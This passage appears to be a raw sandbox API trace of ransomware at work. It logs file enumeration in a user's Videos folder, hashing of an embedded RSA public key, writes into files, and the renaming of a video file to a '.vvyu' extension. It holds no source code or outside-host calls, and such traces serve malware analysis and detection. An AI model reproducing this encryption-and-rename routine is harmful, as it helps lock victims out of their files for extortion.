hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3308 | out: hHeap=0x620000) returned 1 [0200.191] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0200.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0200.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0200.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0200.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0200.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32c0 | out: hHeap=0x620000) returned 1 [0200.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32c0 [0200.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0200.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0200.192] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3320 | out: hHeap=0x620000) returned 1 [0200.192] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0200.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3350 | out: hHeap=0x620000) returned 1 [0200.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0200.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0200.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0200.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0200.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32c0 | out: hHeap=0x620000) returned 1 [0200.197] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0200.197] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0200.198] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0200.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0200.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0200.198] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0200.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0200.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0200.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.199] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0200.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0200.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0200.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32f0 | out: hHeap=0x620000) returned 1 [0200.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3338 | out: hHeap=0x620000) returned 1 [0200.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0200.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32d8 | out: hHeap=0x620000) returned 1 [0200.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32a8 | out: hHeap=0x620000) returned 1 [0200.200] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0200.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0200.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0200.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3290 | out: hHeap=0x620000) returned 1 [0200.201] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8f8a0 | out: hHeap=0x620000) returned 1 [0200.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0200.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0200.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.202] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0200.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0200.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0200.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.203] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0200.204] WriteFile (in: hFile=0x510, lpBuffer=0x2e902a0*, nNumberOfBytesToWrite=0x1254, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e902a0*, lpNumberOfBytesWritten=0x312fb14*=0x1254, lpOverlapped=0x0) returned 1 [0200.204] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a0 | out: hHeap=0x620000) returned 1 [0200.204] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x1259, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.204] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0200.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0200.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0200.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0200.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0200.205] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0200.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0200.206] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0200.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0200.206] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0200.206] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0200.206] CloseHandle (hObject=0x510) returned 1 [0200.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0200.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0200.209] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0200.209] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\kYxGt6chL81vzY.avi" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\kyxgt6chl81vzy.avi"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\kYxGt6chL81vzY.avi.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\kyxgt6chl81vzy.avi.vvyu")) returned 1 [0200.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0200.211] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0200.211] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.214] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0200.214] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85a1f100, ftCreationTime.dwHighDateTime=0x1d89c02, ftLastAccessTime.dwLowDateTime=0xda201820, ftLastAccessTime.dwHighDateTime=0x1d89fd0, ftLastWriteTime.dwLowDateTime=0xda201820, ftLastWriteTime.dwHighDateTime=0x1d89fd0, nFileSizeHigh=0x0, nFileSizeLow=0x4a1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OH6QpPTsq5hUEw3V98y.swf", cAlternateFileName="OH6QPP~1.SWF")) returned 1 [0200.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccace8 [0200.214] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0200.215] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0200.215] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\OH6QpPTsq5hUEw3V98y.swf") returned=".swf" [0200.215] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\OH6QpPTsq5hUEw3V98y.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\oh6qpptsq5huew3v98y.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0200.215] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=1185) returned 1 [0200.215] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0200.218] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x47b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0200.218] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0200.220] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0200.220] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0200.220] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0200.221] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x4a1, lpOverlapped=0x0) returned 1 [0200.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0200.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.221] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0200.221] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c278) returned 1 [0200.222] CryptCreateHash (in: hProv=0x67c278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0200.222] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0200.222] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0200.222] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0200.222] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0200.222] GetLastError () returned 0x0 [0200.222] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0200.222] CryptReleaseContext (hProv=0x67c278, dwFlags=0x0) returned 1 [0200.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0200.223] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0200.223] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0200.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.223] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0200.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0200.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0200.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4a0) returned 0x2ea6a68 [0200.223] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0200.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0200.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0200.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0200.223] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0200.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0200.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f8a0 [0200.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3290 [0200.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8f8e8 [0200.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32a8 [0200.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32d8 [0200.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3338 [0200.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32f0 [0200.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0200.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0200.224] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0200.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6f10 [0200.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32d8 | out: hHeap=0x620000) returned 1 [0200.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32f0 | out: hHeap=0x620000) returned 1 [0200.224] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3338 | out: hHeap=0x620000) returned 1 [0200.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0200.225] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6f10 | out: hHeap=0x620000) returned 1 [0200.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3338 [0200.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0200.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32f0 [0200.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0200.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea32d8 [0200.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0200.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0200.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83750 [0200.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0200.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0200.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0200.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0200.226] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0200.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0200.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32f0 | out: hHeap=0x620000) returned 1 [0200.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0200.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea32d8 | out: hHeap=0x620000) returned 1 [0200.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0200.226] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3338 | out: hHeap=0x620000) returned 1 [0200.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0200.227] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0200.228] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0200.228] GetCurrentThreadId () returned 0x66c [0200.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0200.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea7e48 [0200.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0200.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0200.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0200.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0200.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0200.228] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.229] GetCurrentThreadId () returned 0x66c [0200.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0200.229] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0200.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0200.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0200.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0200.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0200.230] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0200.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0200.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0200.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3338 [0200.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0200.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0200.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0200.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0200.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0200.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0200.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea32d8 [0200.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0200.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0200.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0200.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0200.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0200.231] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0200.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0200.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea32f0 [0200.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0200.232] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0200.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 